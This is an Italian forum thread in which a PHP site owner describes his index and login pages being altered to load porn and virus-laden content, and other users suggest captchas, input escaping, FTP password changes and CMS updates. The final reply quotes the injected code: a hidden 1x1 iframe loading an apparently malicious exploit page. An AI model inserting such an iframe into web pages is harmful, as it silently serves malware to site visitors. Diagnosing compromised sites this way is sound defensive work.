Problema forse di spam...

[AxErider]

Ciao,

ho creato un sito interamente in PHP e da una settimana a questa parte mi succedono cose per me incomprensibili.
Praticamente durante il caricamento delle pagine INDEX.PHP e LOGIN.PHP vengono caricate altre cose che non centrano nulla con il mio dominio anzi, sono proprio domini porno con allegati una bella sfilza di virus, impedendo quindi il caricamento della pagina VVoVe: e inserendo nel guestbook collegamenti a sito porno appunto.
Volevo chiedere se qualcuno sapesse come fare ad ovviare a questo tipo di SPAM (penso) e come posso rendere più sicuro il sito...ormai non so più dove sbattere la testa...

se volete controllare www.redelcemento.netsons.org

GRAZIE MILLE...

[equiweb.it]

nn ho trovato nulla...

cmq...potresti:
implementare un sistema captcha nel tuo form ( http://forum.html.it/forum/showthrea...hreadid=807514 )

convertire tutti i caratteri html prima che vengano inserite ( www.php.net/htmlentities )
e poi fai l'escape dei caratteri pericolosi ( http://forum.html.it/forum/showthrea...ostid=10166292 )


ciauz

[AxErider]

grazie mille...la sostituzione dei caratteri speciali già lo faccio
ma il mio problema è come evitare che le pagine riportino dei virus pur non essendoci nulla di "INQUINATO" nel codice...
vorrei sapere come cavolo fanno a fare queste cose!!!

[equiweb.it]

beh... devi postare un esempio di codice che ti sei trovato nella pagina...altrimenti è difficile capire...

cmq se converti ogni tag html dovrebbe essere impossibile inserire un qualsiasi codice funzionante...

ciauz

[AxErider]

non è codice quello che viene inserito...il fatto che vengona inseriti link porno nel guestbook è un problema secondario...
quello che non riesco a capire sono i VIRUS che si vengono caricati con la pagina INDEX e LOGIN che invece, nel codice non presentano anomalie...
anche io non riesco a capire...immagino te a capire me... se ti connetti al mio sito che puoi vedere nel mio profilo magari puoi capire di più...ti assicuro che nel codice non c'è nulla!!!

[equiweb.it]

continuo a nn capire...
mettimi l'indirizzo di una pagina che contiene "virus"

altra cosa...implementa come ti ho detto un sistema captcha...perchè altrimenti per i bot è facile inserire messaggi in modo automatico...

ciauz

[AxErider]

darti il link di una pagina che contiene un virus non posso...non sono io che li inserisco...di solito midificano le pagine di notte...

per quanto riguarda un sistema captcha lo farò al più presto...

purtroppo devo andare

magari ci sentiamo domani sera...lascerò le pagine infettate così come sono per fartele vedere...

grazie mille ancora...ciao!

[soichiro]

Hai provato richiedere all'hoster il cambio della password ftp?
perchè se ti hanno trovato la password ftp il problema stà li.

[alcio74]

Dai anche un'occhiata alla Guida di Sicurezza in PHP .

Lì trovi un po' di consigli vari, tra cui quello per proteggersi dagli attacchi di tipo XSS.

Il discorso è che se hai utilizzato un CMS in php (tipo php-nuke), essendo diffusissimo e open-source, vari cracker hanno potuto studiarne il codice e trovarne tutte le falle più o meno colossali.
Magari qualcuno ha anche trovato le tue password FTP, ma certo che trovo possa essere davvero l'ultima delle ipotesi.
Infine, se il tuo sito si trova in uno spazio web free con banner, non è escluso che i banner di cui parli, siano proprio quelli in rotazione sul tuo hoster!

[equiweb.it]

è davvero strano....ho dato un occhiata oggi...e nel body è comparso un ifram

codice:

<iframe width="1" height="1" style="border: medium none ;" src="http://1com.ws/exp/index.php">

verso un sito russo...

come ti han consigliato il problema potrebbe essere dovuto al cms (se ne usi uno)

controllo che nn sia uscita una nuova versione...

ciauz